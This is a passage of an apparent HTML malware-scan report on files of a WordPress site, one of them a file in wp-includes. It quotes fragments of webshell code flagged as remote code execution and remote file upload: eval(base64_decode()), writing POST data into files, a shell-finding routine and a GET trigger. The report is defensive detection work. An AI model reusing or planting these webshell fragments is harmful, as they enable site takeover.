</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_filesize</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 455</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" gb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" mb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 466</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" kb"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 472</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$filesize</span><span style="color: #007700">.</span><span style="color: #DD0000">" b"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 476</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_time</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no info"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 483</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$time</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 490</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">perms</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$check</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 508</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$perms</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 510</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"<font color=</span><span style="color: #0000BB">$color</span><span style="color: #DD0000">>"</span><span style="color: #007700">.</span><span style="color: #0000BB">$perms</span><span style="color: #007700">.</span><span style="color: #DD0000">"</font>"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 512</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">CMS</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 515</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Joomla!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 517</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"WordPress"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 519</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"Unknown"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 521</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">folder_separate</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 526</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$path2</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 529</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">side_bar</span><span style="color: #007700">(</span><span style="color: #0000BB">$make_file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 560</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">edit_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">$current</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 62</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$files</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 96</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">del_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 99</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"file not exists"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")"'; $search_str10 = '</span><span style="color: #0000BB">is_uploaded_file</span><span style="color: #DD0000">'; $search_str11 = '</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)) { $arr_php_file = findshells($_SERVER['</span><span style="color: #0000BB">DOCUMENT_</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 294</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">arr_php_file </span><span style="color: #007700">= </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 689d8acc <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 65</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 689d8acc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">if (isset(</span><span style="color: #0000BB">$_GET</span><span style="color: #007700">[</span><span style="color: #DD0000">'juke'</span><span style="color: #007700">]))
<br />{
<br /> </span><span style="color: #0000BB">$arr_files </span><span style="color: #007700">= </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_49").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-includes/szFmdwRAK8U.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 28.35 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:25:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 44</span><br><table id="file_50" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit download_remote_code2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 652</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str2 = '</span><span style="color: #007700">Array(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str3 = '</span><span style="color: #007700">@</span><span style="color: #0000BB">$isbot</span><span style="color: #DD0000">'; $search_str4 = '</span><span style="color: #007700">@require</span><span style="color: #DD0000">'; $search_str5 = '</span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'; $search_str6 = '</span><span style="color: #007700">@include </span><span style="color: #DD0000">"\x2'; </span><span style="color: #0000BB">$search_str7</span><span style="color: #DD0000"> = '</span><span style="color: #0000BB">$OO</span><span style="color: #DD0000">'; </span><span style="color: #0000BB">$search_str8</span><span style="color: #DD0000"> = 'cache=00'; </span><span style="color: #0000BB">$search_str9</span><span style="color: #DD0000"> = 'file_get_contents(\"../index.php\")</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">'; $search_str12 = '</span><span style="color: #0000BB">multipart</span><span style="color: #007700">/</span><span style="color: #0000BB">form</span><span style="color: #007700">-</span><span style="color: #0000BB">data</span><span style="color: #DD0000">'; if (!file_exists($finderdata_path)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; } else { if (!</span><span style="color: #0000BB">chmod</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #0000BB">0755</span><span style="color: #007700">)) return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">; </span><span style="color: #0000BB">$fp </span><span style="color: #007700">= </span><span style="color: #0000BB">fopen </span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">, </span><span style="color: #DD0000">"w"</span><span style="color: #007700">); if (</span><span style="color: #0000BB">fwrite </span><span style="color: #007700">(</span><span style="color: #0000BB">$fp</span><span style="color: #007700">, </span><span style="color: #0000BB">$_POST </span><span style="color: #007700">[</span><span style="color: #DD0000">'new'</span><span style="color: #007700">])) </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color="green"><b>Edited!</b></font>'</span><span style="color: #007700">; else </span><span style="color: #0000BB">$message </span><span style="color: #007700">= </span><span style="color: #DD0000">' - <font color=</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 105</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"no have permission for chmod!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"can not delete!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 111</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"ok!"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">unzip_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">read_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 181</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clear_folder</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 202</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">only_read</span><span style="color: #007700">(</span><span style="color: #0000BB">$file_name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 233</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$original_file</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 236</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">findshells</span><span style="color: #007700">(</span><span style="color: #0000BB">$start</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 262</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$arr_filename</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 279</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #DD0000">';</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 39</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|</span><span style="color: #0000BB">void The string of the URL</span><span style="color: #007700">, if </span><span style="color: #0000BB">redirect needed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DirFilesR</span><span style="color: #007700">(</span><span style="color: #0000BB">$dir</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
